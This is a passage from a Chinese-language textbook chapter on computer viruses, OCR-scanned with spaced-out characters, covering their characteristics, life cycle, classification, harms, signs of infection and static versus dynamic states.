兼容 机 的 ， 有 针对 Apple 公司 的 Macintosh 的 ， 还 有 针对 UNIX 操作 系统 的 。 

8) ”病毒 的 非 授权 性 

病毒 未 经 授权 而 执行 。 一 般 正 常 的 程序 是 由 用 户 调用 ， 再 由 系统 分 配 资源 ， 完 成 用 户 
交 给 的 任务 ， 其 目的 对 用 户 是 可 见 的 、 透 明 的 。 而 病毒 具有 正常 程序 的 一 切 特性 ， 它 隐藏 
在 正常 程序 中 ， 当 用 户 调用 正常 程序 时 它 窃取 到 系统 的 控制 权 ， 先 于 正常 程序 执行 ， 病 毒 
的 动作 、 目 的 对 用 户 是 未 知 的 ， 是 未 经 用 户 允 许 的 。 

9) “病毒 的 隐蔽 性 

病毒 一 般 是 具有 很 高 的 编程 技巧 、 短 小 精 悍 的 程序 。 通 常 附 在 正常 程序 中 或 磁盘 较 隐 
蔽 的 地 方 ， 也 有 个 别 的 以 隐 含 文件 形式 出 现 ， 目 的 是 不 让 用 户 发 现 它 的 存在 。 如 果 不 经 过 
代码 分 析 ， 病 毒 程序 与 正常 程序 是 不 容易 区 别 开 来 的 。 一 般 在 没有 防护 措施 的 情况 下 ， 计 
算 机 病毒 程序 取得 系统 控制 权 后 ， 可 以 在 很 短 的 时 间 里 传染 大 量程 序 。 而 且 受到 传染 后 ， 
计算 机 系统 通常 仍 能 正常 运行 ， 使 用 户 不 会 感到 任何 异常 ， 好 像 不 曾 在 计算 机 内 发 生 过 什 
么 一 样 。 试 想 ， 如 果 病 毒 在 传染 到 计算 机 上 之 后 ， 机 器 马上 无 法 正常 运行 ， 那 么 它 本 身 便 
无 法 继续 进行 传染 了 。 正 是 由 于 隐蔽 性 ， 计 算 机 病毒 得 以 在 用 户 没有 察觉 的 情况 下 扩散 并 
运行 在 计算 机 中 。 大 部 分 的 病毒 的 代码 之 所 以 设计 得 非常 短小 ， 也 是 为 了 隐藏 。 

计算 机 病毒 的 隐蔽 性 表现 在 两 个 方面 。 

(1) 传染 的 隐蔽 性 。 

大 多 数 病毒 在 进行 传染 时 速度 是 极 快 的 ， 一 般 不 具有 外 部 表现 ， 不 易 被 人 发 现 。 确 实 
有 些 病 毒 时 不 时 在 屏幕 上 显示 一 些 图 案 或 信息 ， 或 演奏 一 段 乐曲 ， 往 往 此 时 那 台 计算 机 内 
己 有 许多 病毒 的 复制 了 。 许 多 计算 机 用 户 对 计算 机 病毒 没有 任何 概念 ， 他 们 见 到 这 些 新 奇 
的 屏幕 显示 和 音响 效果 ， 还 以 为 是 来 自 计算 机 系统 的 ， 而 没有 意识 到 这 些 病 毒 正在 损害 计 
算 机 系统 ， 正 在 制造 灾难 。 

(2) 病毒 程序 存在 的 隐蔽 性 。 

一 般 的 病毒 程序 都 夹 在 正常 程序 之 中 ， 很 难 被 发 现 ， 而 一 旦 病毒 发 作出 来 ， 往 往 已 经 
给 计算 机 系统 造成 了 不 同 程度 的 破坏 。 被 病毒 感染 的 计算 机 在 多 数 情况 下 仍 能 维持 其 部 分 
功能 ， 不 会 由 于 刚 被 感 当 上 病毒 ， 整 台 计算 机 就 不 能 启动 了 ， 或 者 某 个 程序 一 被 病毒 所 感 
染 ， 就 被 损坏 得 不 能 运行 了 。 正 常 程序 被 计算 机 病毒 感染 后 ， 其 原 有 功能 基本 上 不 受 影响 ， 
病毒 代码 附 于 其 上 而 得 以 存活 ， 得 以 不 断 地 得 到 运行 的 机 会 ， 去 传染 出 更 多 的 复制 体 ， 与 
正常 程序 争夺 系统 的 控制 权 和 磁盘 空间 ， 不 断 地 破坏 系统 ， 导 致 整个 系统 的 瘫痪 。 

10) 病毒 的 衍生 性 

分 析 计 算 机 病毒 的 结构 可 知 ， 传 染 的 破坏 部 分 反映 了 设计 者 的 设计 思想 和 设计 目的 。 
但 是 ， 这 可 以 被 其 他 掌握 原理 的 人 以 其 个 人 的 企图 进行 任意 改动 ， 从 而 又 衍生 出 一 种 不 同 
于 原版 本 的 新 的 计算 机 病毒 (又 称 为 变种 )， 这 就 是 计算 机 病毒 的 衍生 性 。 这 种 变种 病毒 造 
成 的 后 果 可 能 比 原版 病毒 严重 得 多 。 

11) 病毒 的 寄生 性 (依附 性 ) 

病毒 程序 嵌入 到 宿主 程序 中 ， 依 赖 于 宿主 程序 的 执行 而 生存 ， 这 就 是 计算 机 病毒 的 寄 
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生性 。 病 毒 程序 在 侵入 到 宿主 程序 中 后 ， 一 般 对 宿主 程序 进行 一 定 的 修改 ， 宿 主 程序 一 旦 
执行 ， 病 毒 程序 就 被 激活 ， 从 而 可 以 进行 自我 复制 和 繁衍 。 

12) 病毒 的 持久 性 

即使 病毒 程序 被 发 现 以 后 ， 数 据 和 程序 以 至 操作 系统 的 恢复 都 非常 困难 。 特 别 是 在 网 
络 操作 情况 下 ， 由 于 病毒 程序 由 一 个 受 感染 的 复制 通过 网 络 系统 反复 传播 ， 使 得 病毒 程序 
的 清除 非常 复杂 。 


4.1.3 ”计算 机 病毒 的 生命 周期 


计算 机 病毒 的 产生 过 程 可 分 为 : 程序 设计 一 传播 一 潜伏 一 触发 一 运行 一 实行 攻击 。 计 
算 机 病毒 的 生命 周期 从 生成 开始 到 完全 根除 结束 。 

下 面 介绍 病毒 生命 周期 的 各 个 时 期 。 

1) 开发 期 

在 几 年 前 ， 制 造 一 个 病毒 需要 计算 机 编程 语言 的 知识 。 但 是 今天 有 一 点 计算 机 编程 知 
识 的 人 都 可 以 制造 一 个 病毒 。 通 常 计算 机 病毒 是 一 些 误 入 歧途 的 、 试 图 传播 计算 机 病毒 和 
破坏 计算 机 的 个 人 或 组 织 制造 的 。 

2) ”传染 期 

在 一 个 病毒 制造 出 来 后 ， 病 毒 的 编写 者 将 其 复制 并 确认 其 已 被 传播 出 去 。 通 常 的 办 法 
是 感染 一 个 流行 的 程序 , 再 将 其 放 入 BBS 站 点 上 、 校园 和 其 他 大 型 组 织 当 中 分 发 其 复制 物 。 

3) ”潜伏 期 

病毒 是 自然 地 复制 的 。 一 个 设计 良好 的 病毒 可 以 在 它 活化 前 长 时 期 里 被 复制 ， 这 就 给 
了 它 充裕 的 传播 时 间 。 这 时 病毒 的 危害 在 于 暗中 占据 存储 空间 。 

4) 发 作 期 

带 有 破坏 机 制 的 病毒 会 在 遇 到 某 一 特定 条 件 时 发 作 ， 一 旦 遇 上 某 种 条 件 ， 病 毒 就 被 激 
活 了 。 没 有 感染 程序 的 病毒 属于 没有 激活 ， 这 时 病毒 的 危害 在 于 暗中 占据 存储 空间 。 

5) ”发 现 期 

当 一 个 病毒 被 检测 到 并 被 隔离 出 来 后 ， 它 被 送 到 计算 机 安全 协会 或 反 病毒 厂家 ， 在 那 
里 病毒 被 通报 和 描述 给 反 病 毒 研究 工作 者 。 通 常 发 现 病毒 是 在 病毒 成 为 计算 机 社会 的 灾难 
之 前 完成 的 。 

6) 消化 期 

在 这 一 阶段 ， 反 病毒 开发 人 员 修 改 他 们 的 软件 以 使 其 可 以 检测 到 新 发 现 的 病毒 。 这 段 
时 间 的 长 短 取决 于 开发 人 员 的 素质 和 病毒 的 类 型 。 

7) 消亡 期 

若是 所 有 用 户 安装 了 最 新 版 的 杀毒 软件 ， 那 么 任何 病毒 都 将 被 扫除 。 这 样 没有 什么 病 
毒 可 以 广泛 地 传播 ， 但 有 一 些 病毒 在 消失 之 前 有 一 个 很 长 的 消亡 期 。 至 今 ， 还 没有 哪 种 病 
毒 已 经 完全 消失 ， 但 是 某 些 病毒 已 经 在 很 长 时 间 里 不 再 是 一 个 重要 的 威胁 了 。 


4.1.4 计算 机 病毒 的 分 类 
据 统计 ， 目 前 世界 上 出 现 的 计算 机 病毒 种 类 繁多 ， 约 有 2 000 多 种 ， 为 了 便于 分 析 和 
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检测 ， 根 据 多 年 对 计算 机 病毒 的 研究 ， 按 照 科 学 、 系 统 、 严 密 的 方法 ， 计 算 机 病毒 分 类 
如 下 。 


1. 按 攻击 对 象 分 类 


车 按 病 毒 攻击 的 对 象 来 分 类 ， 可 分 为 攻击 微型 计算 机 、 小 型 机 和 工作 站 的 病毒 ， 甚 至 
安全 措施 很 好 的 大 型 机 及 计算 机 网 络 也 是 病毒 攻击 的 目标 。 这 些 攻 击 对 象 之 中 ， 以 攻击 微 
型 计算 机 的 病毒 最 多 ， 其 中 90% 是 攻击 IBM PC 及 其 兼容 机 的 。 其 他 还 有 攻击 Macintosh 
及 Amiga 计算 机 的 。 


2. 按 入 侵 途 径 分 类 


按 计算 机 病毒 浸入 系统 的 途径 ， 微 型 计算 机 的 病毒 大 致 可 分 为 四 类 。 

1) “操作 系统 病毒 

小 球 病毒 和 大 麻 病 毒 就 属于 典型 的 操作 系统 病毒 。 这 类 病毒 用 病毒 本 身 的 程序 意图 加 
入 或 替代 部 分 操作 系统 进行 工作 。 操作 系统 病毒 是 常见 的 计算 机 病毒 ， 具 有 很 强 的 破坏 力 。 
这 是 因为 整个 计算 机 是 在 操作 系统 的 控制 之 下 运行 。 该 类 病毒 的 入 侵 造 成 病毒 程序 对 系统 
持续 不 断 的 攻击 。 严 重 时 ， 可 导致 整个 系统 的 瘫痪 。 

一 般 操作 系统 类 病毒 ， 当 系统 引导 时 就 把 病毒 程序 从 磁盘 上 装 入 内 存 中 ， 在 系统 运行 
时 ， 不断 捕捉 CPU 的 控制 权 ， 进 行 计算 机 病毒 的 扩散 。 

2) ”外 过 病毒 

这 类 病毒 常 附 在 宿主 程序 的 首尾 ， 一 般 对 源 程序 不 进行 修改 。 外 壳 程 序 较 常见 ， 大 约 
有 半数 左右 的 计算 机 病毒 采用 这 种 方式 来 传播 病毒 的 。 外 壳 病 毒 容易 编写 ， 也 易于 检测 ， 
一 般 测试 可 执行 文件 的 长 度 就 可 找到 。 对 于 IBM PC 及 其 兼容 机 ， 外 过 病毒 一 般 感染 DOS 
下 的 可 执行 程序 。 

3) ”源码 病毒 

源码 类 病毒 在 程序 被 编译 之 前 插入 到 用 FORTRAN、PASCAL、C 或 COBOL 等 语言 编 
制 的 源 程 序 之 中 。 源 码 病 毒 往往 隐藏 在 大 型 程序 之 中 。 一 旦 插入 到 大 型 程序 中 其 破坏 力 和 
危害 性 是 很 大 的 。 

在 当前 国际 上 流行 的 计算 机 病毒 中 ， 源 码 病毒 较为 少见 ， 编 写 源码 病毒 程序 的 难度 较 
大 ， 受 病毒 程序 感染 的 程序 对 象 也 有 一 定 的 限制 。 

4) 入侵 病毒 

入 侵 类 病毒 进入 到 主 程序 之 中 ， 并 替代 主 程序 中 部 分 不 常用 到 的 功能 模块 或 堆栈 区 。 
当 入 侵 病 毒 进 入 到 主 程序 后 ， 不 破坏 主 程序 就 难以 除去 病毒 程序 。 

入 侵 病毒 难以 编写 。 这 类 病毒 一 般 是 针对 某 些 特定 程序 而 编写 的 。 


3. 按 传染 方式 分 类 


按 传 染 方式 分 类 ， 微 型 机 的 病毒 可 分 为 下 述 三 类 。 

1) ”传染 磁盘 引导 区 的 病毒 

每 种 病毒 都 有 自身 特定 的 寄生 宿主 。 传 染 磁盘 引导 区 的 计算 机 病毒 的 寄生 宿主 就 是 
DOS 的 磁盘 引导 程序 。20 世纪 人 们 普遍 用 软盘 来 做 系统 启动 盘 ， 那 么 对 软盘 来 说 ， 引 导 程 
序 只 有 DOS 的 BOOT 区 引导 程序 。 而 对 于 硬盘 ， 有 传染 硬盘 主 引导 程序 的 计算 机 病毒 和 
传染 硬盘 DOS 分 区 中 BOOT 区 引导 程序 。 
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2) ”传染 可 执行 文件 的 病毒 

(1) 传染 操作 系统 文件 的 病毒 。 

这 类 病毒 传染 操作 系统 运行 时 所 必需 的 文件 .如 传染 PC-DOS 操作 系统 中 的 BM BIO、 
COM、IBM DOS、COM 及 COMMAND、COM 等 操作 系统 核心 文件 。 

(2) 传染 一 般 可 执行 文件 的 病毒 。 

这 种 病毒 寄生 于 一 般 以 COM 或 EXE 为 扩展 名 的 可 执行 文件 中 ， 或 者 扩展 名 为 OVL、 
OVR、SYS、OBJ 等 可 执行 文件 中 。 病 毒 传染 可 执行 文件 后 ， 将 自身 链接 于 被 传染 程序 的 
头 部 或 尾部 。 这 种 病毒 一 般 都 要 修改 被 传染 程序 的 长 度 和 一 些 控制 信号 ， 以 保证 病毒 成 为 
可 执行 程序 的 一 部 分 。 这 类 病毒 的 传染 性 很 强 。 

(3) 既 传染 文件 又 传染 磁盘 引导 区 的 病毒 。 

目前 出 现 了 一 些 病毒 ， 它 们 不 但 传染 可 执行 文件 ， 而 且 还 传染 磁盘 的 引导 区 。 如 Flip 
病毒 ， 新 世纪 病毒 等 。 新 世纪 病毒 不 仅 传染 以 COM 和 EXE 为 扩展 名 的 可 执行 文件 ， 而 且 
还 传染 硬盘 的 主 引导 区 。 这 类 计算 机 病毒 的 消除 工作 更 加 困难 ， 被 这 种 病毒 传染 的 系统 用 
FOR-MAT 命令 格式 化 硬盘 都 不 能 消除 病毒 。 

4. 按 病毒 存在 的 媒体 分 类 


按 病毒 存在 的 媒体 ， 病 毒 可 以 分 为 网 络 病毒 、 文 件 病毒 和 引导 型 病毒 。 网 络 病毒 通过 
计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ; 文件 病毒 感染 计算 机 中 的 文件 (如 : COM、 EXE、 
DOC 等 ); 引导 型 病毒 感染 启动 扇 区 (BooD 和 硬盘 的 系统 引导 扇 区 (MBR)。 还 有 这 三 种 情况 
的 混合 型 ， 例 如 : 多 型 病毒 文件 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 种 目标 ， 这 样 的 病毒 通 
常 都 具有 复杂 的 算法 ， 它 们 使 用 非常 规 的 办 法 侵入 系统 ， 同 时 使 用 了 加 密 和 变形 算法 。 

5. 按 病毒 破坏 的 能 力 分 类 


按 病 毒 破坏 的 能 力 大 小 ， 病 毒 可 分 为 以 下 几 种 。 

(1) 无 害 型 。 除 了 传染 时 减少 磁盘 的 可 用 空间 外 ， 对 系统 没有 其 他 影响 。 

(2) 无 危险 型 。 这 类 病毒 仅仅 是 减少 内 存 、 显 示 图 像 、 发 出 声音 及 同类 音响 。 

(3) 危险 型 。 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 。 这 类 病毒 删除 程序 、 破 坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 
的 信息 。 

一 些 无 害 型 病毒 也 可 能 会 对 新 版 的 DOS、Windows 和 其 他 操作 系统 造成 破坏 。 例 如 : 
在 早期 的 病毒 中 ， 有 一 个 “Denzuk ”病毒 在 360K 磁盘 上 很 好 地 工作 ， 不 会 造成 任何 破坏 ， 
但 是 在 后 来 的 高 密度 软盘 上 却 能 引起 大 量 的 数据 丢失 。 


6. 按 计算 机 病毒 特有 的 算法 分 类 


1) ”伴随 型 病毒 

这 一 类 病毒 并 不 改变 文件 本 身 ， 它 们 根据 算法 产生 EXE 文件 的 伴随 体 ， 具有 同样 的 名 
字 和 不 同 的 扩展 名 (COM)。 例 如 : XCOPY.EXE 的 伴随 体 是 XCOPY.COM。 病 毒 把 自身 写 
入 COM 文件 并 不 改变 EXE 文件 ， 当 DOS 加 载 文 件 时 ， 伴 随 体 优先 被 执行 到 ， 再 由 伴随 
体 加 载 执行 原来 的 EXE 文件 。 
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2) “蠕虫 ”型 病毒 

通过 计算 机 网 络 传播 ， 不 改变 文件 和 资料 信息 ， 利 用 网 络 从 一 台 机 器 的 内 存 传播 到 其 
他 机 器 的 内 存 ， 计 算 网 络 地 址 ， 将 自身 的 病毒 通过 网 络 发 送 。 有 时 它们 在 系统 存在 ， 一 般 
除了 内 存 ， 不 占用 其 他 资源 。 

3) “寄生 型 病毒 

除了 “伴随 ”和 “蠕虫 ” 型， 其 他 病毒 均 可 称 为 寄生 型 病毒 ， 它 们 依附 在 系统 的 引导 
扇 区 或 文件 中 ， 通 过 系统 的 功能 进行 传播 。 按 其 算法 不 同 可 分 为 : 练习 型 病毒 ， 病 毒 自身 
包含 错误 ， 不 能 进行 很 好 的 传播 ， 例 如 一 些 病毒 在 调试 阶段 ， 诡 秘 型 病毒 ， 它 们 一 般 不 直 
接 修改 DOS 中 断 和 扇 区 数据 ， 而 是 通过 设备 技术 和 文件 缓冲 区 等 DOS 内 部 修改 ， 不 易 看 
到 资源 ， 使 用 比较 高 级 的 技术 ， 变 型 病毒 (又 称 幽 灵 病 毒 )， 这 一 类 病毒 使 用 一 个 复杂 的 算 
法 ， 使 自己 每 传播 一 份 都 具有 不 同 的 内 容 和 长 度 。 它 们 一 般 是 由 一 段 混 有 无 关 指 令 的 解码 
算法 和 被 变化 过 的 病毒 体 组 成 。 

7. 按 表现 性 质 分 类 


按 表现 性 质 ， 病 毒 可 分 为 良性 的 和 恶性 的 。 良 性 的 危害 性 小 ， 不 破坏 系统 和 数据 ， 但 
大 量 占 用 系统 开销 ， 将 使 机 器 无 法 正常 工作 ， 陷 于 瘫痪 ， 如 国内 出 现 的 圆 点 病毒 就 是 良性 
的 。 恶 性 病毒 可 能 会 毁坏 数据 文件 ， 也 可 能 使 计算 机 停止 工作 ， 按 激活 的 时 间 可 分 为 定时 
的 和 随机 的 。 

恶意 病毒 的 “四 大 家 族 ” 如 下 。 

(1) 宏 病 毒 。 

(2) CIH 病毒 。 

(3) 蠕虫 病毒 。 

(4) 木马 病毒 。 


4.2 计算 机 病毒 的 危害 及 其 表现 


在 计算 机 病毒 出 现 的 初期 ， 说 到 计算 机 病毒 的 危害 ， 往 往 注重 于 病毒 对 信息 系统 的 直 
接 破 坏 作用 ， 比 如 格式 化 硬盘 、 删 除 文件 数据 等 ， 并 以 此 来 区 分 恶性 病毒 和 良性 病毒 。 其 
实 这 些 只 是 病毒 劣迹 的 一 部 分 ， 随 着 计算 机 应 用 的 发 展 ， 人 们 深刻 地 认识 到 凡是 病毒 都 可 
能 对 计算 机 信息 系统 造成 严重 的 破坏 。 


4.2.1 计算 机 病毒 的 危害 


计算 机 病毒 的 主要 危害 有 以 下 几 种 。 

1) “病毒 激发 对 计算 机 数据 信息 的 直接 破坏 作用 

大 部 分 病毒 在 激发 的 时 候 直接 破坏 计算 机 的 重要 信息 数据 ， 所 利用 的 手段 有 格式 化 磁 
盘 、 改 写 文件 分 配 表 和 目录 区 、 删 除 重要 文件 或 者 用 无 意义 的 垃圾 数据 改写 文件 、 破 坏 
CMOS 设置 等 。 
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2) ”占用 磁盘 空间 和 对 信息 的 破坏 

寄生 在 磁盘 上 的 病毒 总 要 非法 占用 一 部 分 磁盘 空间 。 引 导 型 病毒 的 一 般 侵占 方式 是 由 
病毒 本 身 占据 磁盘 引导 扇 区 ， 覆 盖 一 个 磁盘 扇 区 。 被 覆盖 的 扇 区 数据 永久 性 丢失 ， 无 法 恢 
复 ， 所 以 在 传染 过 程 中 一 般 不 破坏 磁盘 上 的 原 有 数据 ， 但 非法 侵占 了 磁盘 空间 ， 造 成 磁盘 
空间 的 严重 浪费 。 

3) ”抢占 系统 资源 

除 VIENNA、CASPER 等 少数 病毒 外 ， 其 他 大 多 数 病 毒 在 动态 下 都 是 常 驻 内 存 的 ， 这 
就 必然 抢占 一 部 分 系统 资源 。 病 毒 所 占用 的 基本 内 存 长 度 大 致 与 病毒 本 身长 度 相当 。 病 毒 
抢占 内 存 ， 导 致 内 存 减 少 ， 一 部 分 软件 不 能 运行 。 除 占用 内 存 外 ， 病 毒 还 抢占 中 断 ， 干 扰 
系统 运行 。 

人 ”影响 计算 机 运行 速度 

病毒 进驻 内 存 后 不 但 干扰 系统 运行 ， 还 影响 计算 机 速度 ， 主 要 表现 在 以 下 方面 。 

(1) 病毒 为 了 判断 传染 激发 条 件 ， 总 要 对 计算 机 的 工作 状态 进行 监视 ， 这 相对 于 计算 
机 的 正常 运行 状态 既 多 余 又 有 害 。 

(2) 有 些 病毒 为 了 保护 自己 ， 不 但 对 磁盘 上 的 静态 病毒 加 密 ， 而 且 进驻 内 存 后 的 动态 
病毒 也 处 在 加 密 状态 ; 而 病毒 运行 结束 时 再 用 一 段 程序 对 病毒 重新 加 密 。 这 样 CPU 额外 执 
行 数 千 条 以 至 上 万 条 指令 。 

(3) 病毒 在 进行 传染 时 同样 要 插入 非法 的 额外 操作 ， 特 别 是 传染 软盘 时 不 但 计算 机 速 
度 明 显 变 慢 ， 而 且 软 盘 正常 的 读 写 顺序 被 打 乱 ， 发 出 刺耳 的 噪声 。 

5) ”计算 机 病毒 错误 与 不 可 预见 的 危害 

计算 机 病毒 与 其 他 计算 机 软件 的 最 重要 差别 是 病毒 的 无 责任 性 。 编 制 一 个 完善 的 计算 
机 软件 需要 耗费 大 量 的 人 力 、 物 力 ， 经 过 长 时 间 调 试 完善 ， 软 件 才能 推出 。 但 在 病毒 编制 
者 看 来 既 没 有 必要 这 样 做 ， 也 不 可 能 这 样 做 。 很 多 计算 机 病毒 都 是 个 别人 在 一 台 计 算 机 上 
匆匆 编制 调试 后 就 向 外 抛 出 ， 绝 大 部 分 病毒 都 存在 不 同 程度 的 错误 。 计 算 机 病毒 错误 所 产 
生 的 后 果 往 往 是 不 可 预见 的 ， 反 病毒 工作 者 曾经 详细 指出 黑色 星期 五 病毒 存在 9 处 错误 ， 
乒乓 病毒 有 5 处 错误 等 。 但 是 人 们 不 可 能 花费 大 量 时 间 去 分 析 数 万 种 病毒 的 错误 所 在 。 大 
量 含有 未 知 错误 的 病毒 扩散 传播 ， 其 后 果 是 难以 预料 的 。 

6) “计算 机 病毒 的 兼容 性 对 系统 运行 的 影响 

兼容 性 是 计算 机 软件 的 一 项 重要 指标 , 兼容 性 好 的 软件 可 以 在 各 种 计算 机 环境 下 运行 ， 
反之 兼容 性 差 的 软件 则 对 运行 条 件 “ 挑 肥 拒 瘦 ”， 要 求 机 型 和 操作 系统 版 本 等 ， 而 病毒 的 
兼容 性 较 差 ， 常 常会 导致 死机 。 

7) ”计算 机 病毒 给 用 户 造成 严重 的 心理 压力 

据 有 关 计 算 机 销售 部 门 统计 ， 计 算 机 售后 用 户 怀疑 计算 机 有 病毒 而 提出 咨询 约 占 售后 
服务 工作 量 的 60% 以 上 。 经 检测 确实 存在 病毒 的 约 占 70%， 另 有 30% 的 情况 只 是 用 户 
怀疑 ， 而 实际 上 计算 机 并 没有 病毒 ， 仅 仅 怀 疑 病毒 而 贸然 格式 化 磁盘 所 带 来 的 损失 更 是 难 
以 弥补 。 不 仅 是 个 人 单机 用 户 ， 在 一 些 大 型 网 络 系统 中 也 难免 为 甄别 病毒 而 停机 。 总 之 计 
算 机 病毒 像 “ 幽 灵 ” 一 样 笼罩 在 广大 计算 机 用 户 心头 ， 给 人 们 造成 巨大 的 心理 压力 ， 极 大 
地 影响 了 现代 计算 机 的 使 用 效率 ， 由 此 带 来 的 无 形 损失 是 难以 估量 的 。 
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4.2.2 ”计算 机 病毒 的 表现 


计算 机 病毒 是 客观 存在 的 ， 客 观 存在 的 事物 总 有 它 的 特性 ， 计 算 机 病毒 也 不 例外 。 从 
实质 上 说 ， 计 算 机 病毒 是 一 段 程序 代码 ， 虽 然 它 可 能 隐藏 得 很 好 ， 但 也 会 留 下 许多 痕迹 。 
通过 对 这 些 蛛 丝 马 迹 的 判别 ， 我 们 就 能 发 现 计算 机 病毒 的 存在 了 。 

计算 机 病毒 发 作 有 以 下 的 种 种 表现 。 

(1) 平时 运行 正常 的 计算 机 突然 经 常 性 无 缘 无 故地 死机 。 

(2) 操作 系统 无 法 正常 启动 。 

(G3) 运行 速度 明显 变 慢 。 

(4) 以 前 能 正常 运行 的 软件 经 常 发 生 内 存 不 足 的 错误 。 

(5) 打印 和 通信 发 生 异 常 。 

(6) 无 意 中 要 求 对 软盘 进行 写 操作 。 

(7) 以 前 能 正常 运行 的 应 用 程序 经 常 发 生死 机 或 者 非法 错误 。 

(8) 系统 文件 的 时 间 、 日 期 、 大 小 发 生变 化 。 

(9) 对 于 Word 文档 ， 另 存 时 只 能 以 模板 方式 保存 ， 无 法 另存 为 一 个 DOC 文档 。 

(10) 磁盘 空间 迅速 减少 。 

(11) 网 络 驱动 器 卷 或 共享 目录 无 法 调用 。 

(12) 基本 内 存 发 生变 化 。 

(13) 收 到 陌生 人 发 来 的 电子 函件 。 

(14) 自动 链接 到 一 些 陌生 的 网 站 。 

一 般 的 系统 故障 是 有 别 于 计算 机 病毒 感染 的 。 系 统 故障 大 多 只 符合 上 面 的 一 点 或 两 点 
现象 ， 而 计算 机 病毒 感染 所 出 现 的 现象 会 多 得 多 。 根 据 上 述 几 点 ， 就 可 以 初步 判断 计算 机 
和 网 络 是 否 感染 上 了 计算 机 病毒 。 在 学 习 、 使 用 计算 机 的 过 程 中 ， 可 能 还 会 遇 到 许 许多 多 
与 病毒 现象 相似 的 软 硬 件 故障 ， 所 以 用 户 要 多 阅读 、 参 考 有 关 资 料 ， 了 解 检测 病毒 的 方法 ， 
并 注意 在 学 习 、 工 作 中 积累 经 验 ， 就 不 难 区 分 病毒 与 软 硬 件 故障 了 。 


4.2.3 ”计算 机 病毒 的 状态 及 潜伏 期 


进入 传播 流行 中 的 计算 机 病毒 有 两 种 状态 ， 即 静态 病毒 和 动态 病毒 。 

静态 病毒 指 寄生 于 存储 介质 (例如 U 盘 、 硬 盘 、 磁 带 等 ) 上 的 计算 机 病毒 。 静 态 病毒 没 
有 处 于 加 载 状态 ， 不 能 进入 计算 机 内 存 ， 因 而 不 能 执行 病毒 的 传染 或 破坏 作用 。 

动态 病毒 是 随 病毒 宿主 的 运行 ， 如 启动 病毒 寄生 的 U 盘 、 硬 盘 ， 或 执行 染 有 病毒 的 程 
序 时 ,病毒 程序 进入 内 存 ， 处 于 运行 状态 或 通过 某 些 中 断 能 立即 获得 运行 权 的 计算 机 病毒 。 
病毒 的 传染 和 破坏 功能 主要 是 动态 病毒 执行 的 。 处 于 内 存 中 的 病毒 时 刻 监视 着 系统 的 运行 ， 
一 旦 传染 条 件 或 破坏 条 件 被 满足 ， 就 调用 病毒 程序 中 的 传染 模块 或 破坏 模块 ， 使 病毒 得 以 
扩散 ， 使 系统 蒙受 损失 。 

动态 病毒 在 计算 机 内 存 中 存在 的 时 间 称 为 动态 病毒 的 生命 期 。 动 态 病毒 的 生命 期 随 病 
毒 种 类 不 同 而 不 同 。 
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常 驻 内 存 型 病毒 在 其 寄生 的 宿主 程序 执行 时 ， 计 算 机 病毒 就 在 内 存 中 开辟 一 块 “ 栖 生 
地 ”长 驻 于 内 存 之 中 。 当 其 原宿 主 程序 执行 完毕 退出 后 ， 病 毒 仍 保留 在 内 存 中 ， 并 通过 侵 
占 的 中 断 向 量 或 修改 的 系统 程序 模块 ， 监 视 系统 的 运行 ， 伺 机 进行 扩散 或 破坏 。 这 类 病毒 
的 生命 期 较 长 ， 会 一 直 延 续 到 下 一 次 重新 启动 或 停机 。“ 黑 色 星 期 五 ”、“ 黑 色 复仇 者 ” 
等 传染 引导 区 的 病毒 均 是 这 种 常 驻 内 存 、 生 命 期 较 长 的 病毒 。 

不 常 驻 内 存 型 病毒 ， 如 维也纳 病毒 ， 随 着 其 病毒 宿主 程序 的 运行 而 进入 内 存 ， 并 在 病 
毒 宿主 程序 执行 完 之 前 根据 传染 或 破坏 的 条 件 ， 完 成 病毒 要 进行 的 传染 或 破坏 作用 。 当 宿 
主 程序 执行 完 时 ， 随 宿主 程序 一 起 退出 内 存 。 因 而 ， 不 常 驻 内 存 型 病毒 的 生命 期 较 短 。 

计算 机 病毒 进入 内 存 ， 变 成 动态 病毒 以 后 ， 并 不 马上 进行 破坏 或 表现 自己 即 显示 一 定 
的 信息 或 图 画 ， 仅 仅 进行 不 断 地 传染 、 扩 散 活动 。 因 而 ， 我 们 很 不 容易 发 现 它们 。 只 有 当 
病毒 程序 破坏 或 表现 模块 的 触发 条 件 满 足 时 ， 如 某 日 某 时 病毒 才 破 坏 系统 或 显示 信息 ， 从 
而 暴露 自己 。 从 病毒 进入 内 存 到 其 破坏 或 表现 模块 被 触发 这 段 时 间 是 病毒 程序 的 潜伏 期 。 
显而易见 ， 一 种 病毒 的 潜伏 期 越 长 ， 病 毒 程序 的 传染 性 可 在 较 长 的 时 间 内 得 到 发 挥 ， 其 传 
染 的 范围 也 就 越 大 。 洪 伏 期 和 传染 性 之 间 的 关系 可 用 如 图 4-1 所 示 的 曲线 表示 。 
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图 4-1 计算 机 病毒 传染 性 与 潜伏 期 的 关系 


病毒 的 潜伏 期 越 长 ， 说 明 病 毒 隐藏 自己 的 潜伏 性 越 好 。 因 而 ， 病 毒 的 潜伏 性 可 用 其 潜 
伏 期 来 衡量 。 

计算 机 病毒 进入 内 存 ， 变 成 动态 病毒 后 ， 一 般 不 是 无 条 件 地 进行 传染 和 破坏 的 。 而 是 
需要 首先 判断 传染 条 件 或 破坏 条 件 是 否 满足 。 待 条 件 达 到 时 ， 才 进行 相应 的 传染 或 破坏 活 
动 。 因 而 ， 计 算 机 病毒 的 活动 都 是 由 条 件 触发 来 实现 的 。 计 算 机 病毒 传染 活动 的 触发 ， 是 
当 系统 工作 条 件 满足 病毒 传染 所 需 条 件 时， 病毒 即将 符合 条 件 的 宿主 传染 。 而 病毒 的 破坏 
或 表现 活动 的 触发 ， 是 当 系 统 条 件 满足 时 。 病 毒 的 破坏 或 表现 模块 被 触发 ， 或 称 之 “被 激 
活 ”， 即 开始 破坏 系统 或 在 被 传染 的 系统 上 表现 自己 。 计 算 机 病毒 的 一 般 工作 流程 ， 可 用 
流程 图 简单 表示 出 来 ， 如 图 4-2 所 示 。 

计算 机 病毒 在 一 定 条 件 下 触发 病毒 的 传染 模块 或 破坏 和 表现 模块 ， 也 就 是 在 满足 一 定 
条 件 下 实行 对 病毒 的 传染 模块 或 破坏 和 表现 模块 的 调用 过 程 。 计 算 机 病毒 传染 活动 或 破坏 
